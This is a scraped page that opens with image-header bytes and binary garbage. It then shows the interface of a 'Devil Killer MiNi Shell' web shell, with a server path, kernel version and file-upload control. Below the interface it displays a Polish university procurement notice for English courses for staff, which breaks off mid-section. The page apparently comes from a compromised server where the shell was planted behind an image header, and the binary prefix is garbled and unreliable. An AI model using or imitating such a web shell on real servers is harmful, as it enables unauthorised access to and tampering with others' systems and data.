JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210823/0015692201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kurs językowy dla pracowników administracyjnych AGH j. angielski specjalistyczny i ogólny na<br/>różnych poziomach zaawansowania w ramach projektu POWR.03.05.00-00-00-Z309/18 – KCzp.272-358/21 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Akademia Górniczo-Hutnicza im. Stanisława Staszica w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001577</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Mickiewicza 30</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-059</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 617 35 95</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp@agh.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.dzp.agh.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kurs językowy dla pracowników administracyjnych AGH j. angielski specjalistyczny i ogólny na<br/>różnych poziomach zaawansowania w ramach projektu POWR.03.05.00-00-00-Z309/18 – KCzp.272-358/21 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ee9f7ec8-03fa-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00156922</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00113836/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.119 kurs językowy dla pracowników administracyjnych AGH z zakresu j.ang specj i j.ang. ogólny na różnych poziomach zaawansowania w ramach POWR.03.05.00-00-Z309/18</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt realizowany w ramach POWR.03.05.00-00-00-Z309/18, współfinansowany ze środków Europejskiego Funduszu Rozwoju Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 Oś III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5 Kompleksowe programy szkół wyższych pt. Zintegrowany Program Rozwoju Akademii GórniczoHutniczej w Krakowie II (ZPR AGH II). </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.dzp.agh.edu.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu<br/>środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem<br/>https://e-propublico.pl lub poczty elektronicznej.<br/>2. Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>3. Na Platformie postępowanie prowadzone jest pod nazwą: Kurs językowy dla pracowników<br/>administracyjnych AGH j. angielski specjalistyczny i ogólny na różnych poziomach zaawansowania w<br/>ramach projektu POWR.03.05.00-00-00-Z309/18 – KC-zp.272-358/21.<br/>4. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki<br/>korzystania z Platformy określone w Regulaminie zamieszczonym na stronie internetowej https://epropublico.pl oraz uznaje go za wiążący.<br/>5. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.<br/>6. Do złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania<br/>Wykonawcy ważnego kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu<br/>osobistego.<br/>7. Ilekroć w niniejszej SWZ jest mowa o:<br/>a) podpisie zaufanym – należy przez to rozumieć podpis, o którym mowa art. 3 pkt 14a ustawy z 17<br/>lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j Dz.U.2020<br/>poz. 346);<br/>b) podpisie osobistym – należy przez to rozumieć podpis, o którym mowa w art. z art. 2 ust. 1 pkt 9<br/>ustawy z 6 sierpnia 2010 r. o dowodach osobistych (t.j Dz.U.2020 poz. 332).<br/>8. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>a) dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie PAdES;<br/>b) dokumenty sporządzone i przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml) zaleca<br/>się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES;<br/>c) do składania kwalifikowanego podpisu elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub<br/>wyższego).<br/>9. Zamawiający określa następujące wymagania sprzętowo – aplikacyjne pozwalające na korzystanie z<br/>Platformy:<br/>a) stały dostęp do sieci Internet;<br/>b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej (e-mail),<br/>c) komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo Linux,<br/>d) zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi,<br/>stabilnymi wersjami wszystkich głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft<br/>Edge, Mozilla Firefox, Google Chrome, Opera),<br/>e) włączona obsługa JavaScript oraz Cookies.<br/>10. Zamawiający dopuszcza następujący format przesyłanych danych: pliki o wielkości do 20 MB w<br/>formatach: .pdf, .doc, .docx., .xlsx, .xml.<br/>11. Zamawiający określa następujące informacje na temat kodowania i czasu odbioru danych:<br/>a) załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie<br/>jest dostępny dla Zamawiającego i przechowywany jest na serwerach Platformy w formie<br/>zaszyfrowanej. Zamawiający otrzyma dostęp do pliku dopiero po upływie terminu otwarcia ofert;<br/>b) oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do dokumentu<br/>elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w<br/>kolumnie ”Data przesłania”;<br/>c) o terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.<br/>12. W postępowaniu, wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane<br/>są za pośrednictwem Platformy (karta ”Wiadomości”). Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przesłanych za pośrednictwem Platformy, przyjmuje się datę ich<br/>zamieszczenia na Platformie.<br/>13. Ofertę, wraz ze stanowiącymi jej integralną część załącznikami, składa się pod rygorem<br/>nieważności w formie elektronicznej lub postaci elektronicznej za pośrednictwem Platformy, podpisaną<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w<br/>rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi. Szczegółowe<br/>określenie zasad związanych z obowiązkiem informacyjnym RODO zawarto w rozdziale 29 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">358/21</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> ZADANIE 1 – angielski specjalistyczny - roczny kurs w zakresie podniesienia kompetencji z języka angielskiego specjalistycznego, rozumianego jako kurs dla uczestników na poziomie średnio-zaawansowanym i wyższym, który ma zawierać elementy: Business English, HR, Finance dla 30 pracowników.<br/>ZADANIE 2 – General English - roczny kurs w zakresie podniesienia kompetencji z języka angielskiego ogólnego (tzw. General English) dla 36 pracowników. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80580000-3 - Oferowanie kursów językowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-07-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia (zadanie nr 1 i zadanie nr 2)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna i zawodowa:<br/>a) Wiedza i doświadczenie<br/>Dla zadania 1- angielski specjalistyczny<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że w<br/>okresie ostatnich trzech lat przed upływem terminu składania ofert<br/>(a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie), należycie zrealizował co<br/>najmniej dwie usługi, z których każda polegała na zorganizowaniu<br/>i przeprowadzeniu cyklu zajęć z języka angielskiego specjalistycznego dla minimum 2-ch grup,<br/>przy liczbie uczestników w jednej grupie minimum 4 osoby.<br/>Poprzez cykl zajęć Zamawiający rozumie zorganizowanie i przeprowadzenie kursu<br/>z języka angielskiego trwającego co najmniej 50 godzin lekcyjnych, przy czym godzina lekcyjna<br/>to 45 minut.<br/>Przez angielski specjalistyczny Zamawiający rozumie kurs obejmujący przekrój zagadnień z<br/>tematyki biznesowej (np. Business English, HR, Finance) na poziomie średnio-zaawansowanym<br/>lub wyższym.<br/>Dla zadania 2 - angielski ogólny tzw. General English<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że w<br/>okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie), należycie zrealizował<br/>co najmniej dwie usługi, z których każda polegała na zorganizowaniu<br/>i przeprowadzeniu cyklu zajęć z języka angielskiego dla osób dorosłych, dla minimum 2 grup,<br/>przy liczbie uczestników w jednej grupie minimum 4 osoby, przy czym zajęcia były prowadzone<br/>metodą bezpośrednią np.: Metodą Callana (Callan Method) lub Direct Language Lab lub Direct<br/>Method lub równoważną.<br/>Przez metodę równoważną Zamawiający rozumie metodę bezpośrednią kładącą nacisk na<br/>słuchanie i mówienie, polegającą na intensywnej nauce języka obcego opartej na podejściu<br/>behawiorystycznym (nauka poprzez wytwarzanie nawyków) oraz powtórzeniach (przerobiony<br/>materiał jest powtarzany wielokrotnie).<br/>Poprzez cykl zajęć Zamawiający rozumie zorganizowanie i przeprowadzenie szkolenia<br/>z języka angielskiego trwającego co najmniej 50 godzin lekcyjnych, przy czym godzina lekcyjna<br/>to 45 minut.<br/>b) Osoby zdolne do wykonania zamówienia<br/>Dla zadania 1<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że<br/>dysponuje lub będzie dysponował co najmniej, :<br/>a/ dwoma lektorami j. angielskiego, z których jeden musi mieć przynajmniej dwuletnie<br/>doświadczenie obejmujące min. 100 godzin nauczania metodą bezpośrednią np.: Metoda<br/>Callana (Callan Method) lub Direct Language Lab lub Direct Method lub równoważną oraz każdy<br/>musi posiadać następujące kwalifikacje zawodowe i doświadczenie:<br/>posiadać minimum 4 letnie doświadczenie w szkoleniach z zakresu języka angielskiego, w tym<br/>co najmniej 2 letnie doświadczenie w szkoleniach osób dorosłych z zakresu języka angielskiego<br/>specjalistycznego;<br/>dyplom ukończenia studiów magisterskich lub wyższych zawodowych na kierunku filologia<br/>angielska lub lingwistyka stosowana obejmująca język angielski i przygotowanie pedagogiczne<br/>lub dyplom ukończenia studiów magisterskich lub wyższych zawodowych ukończonych w kraju,<br/>w którym językiem urzędowym jest język angielski i posiada przygotowanie pedagogiczne lub<br/>certyfikat ukończenia kursu CELTA lub równoważny<br/>b/ dwoma Native speakerami tj. rodzimymi użytkownikami języka angielskiego,<br/>w tym 1 native speakerem z akcentem brytyjskim, z których każdy posiada:<br/>dyplom ukończenia studiów wyższych i przygotowanie pedagogiczne lub certyfikat ukończenia<br/>kursu CELTA lub równoważny;<br/>minimum 3 letnie doświadczenie w szkoleniu z zakresu języka angielskiego osób dorosłych.<br/>Dla zadania 2<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że<br/>dysponuje lub będzie dysponował co najmniej:<br/>a/ dwoma lektorami j. angielskiego, z których jeden musi mieć przynajmniej dwuletnie<br/>doświadczenie obejmujące min. 100 godzin nauczania w nauczaniu metodą bezpośrednią np.:<br/>Metoda Callana (Callan Method) lub Direct Language Lab lub Direct Method lub równoważną<br/>oraz każdy musi posiadać następujące kwalifikacje zawodowe i doświadczenie:<br/>posiadać minimum 4 letnie doświadczenie w szkoleniach z zakresu języka angielskiego, w tym<br/>co najmniej 2 letnie doświadczenie w szkoleniach osób dorosłych z zakresu języka angielskiego;<br/>dyplom ukończenia studiów magisterskich lub wyższych zawodowych na kierunku filologia<br/>angielska lub lingwistyka stosowana obejmująca język angielski i przygotowanie pedagogiczne<br/>lub dyplom ukończenia studiów magisterskich lub wyższych zawodowych ukończonych w kraju,<br/>w którym językiem urzędowym jest język angielski i posiada przygotowanie pedagogiczne lub<br/>certyfikat ukończenia kursu CELTA lub równoważny<br/>b/ dwoma Native speakerami tj. rodzimymi użytkownikami języka angielskiego,<br/>w tym 1 native speakerem z akcentem brytyjskim, z których każdy posiada:<br/>dyplom ukończenia studiów wyższych, przygotowanie pedagogiczne lub certyfikat ukończenia<br/>kursu CELTA lub równoważny;<br/>minimum 3 letnie doświadczenie w szkoleniu z zakresu języka angielskiego osób dorosłych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawca wraz z ofertą składa:<br/>a/ Aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku Nr 2 do SWZ.<br/>Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca nie podlega<br/>wykluczeniu z postępowania . W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców oświadczenie, o którym mowa powyżej składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>b/ W przypadku gdy Wykonawca polega na zasobach podmiotu trzeciego: Oświadczenie o<br/>niepodleganiu wykluczeniu (zał. 2A) podmiotu udostępniającego zasoby</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca wraz z ofertą składa:<br/>a/ Aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku Nr 3 do SWZ.<br/>Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że wykonawca spełnia<br/>warunki udziału w postępowaniu. W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców oświadczenie, o którym mowa powyżej składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>b/ W przypadku gdy Wykonawca polega na zasobach podmiotu trzeciego:<br/>- Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy<br/>-Oświadczenie o spełnianiu warunków udziału w postępowaniu (zał. 2A) podmiotu udostępniającego<br/>zasoby<br/>2. Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień<br/>złożenia, następujących podmiotowych środków dowodowych:<br/>a/ Wykaz usług<br/>b/ wykaz osób</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1/ Formularz oferty. 2/ Pełnomocnictwo lub inny dokument potwierdzający umocowanie do<br/>reprezentowania wykonawcy. Upoważnienie osób podpisujących ofertę wynikać musi<br/>bezpośrednio z dokumentów dołączonych do oferty. Jeżeli upoważnienie takie nie wynika wprost<br/>z dokumentów rejestrowych (KRS, CEiDG lub innego właściwego rejestru), to do oferty należy<br/>dołączyć inny dokument potwierdzający umocowanie do reprezentowania wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i 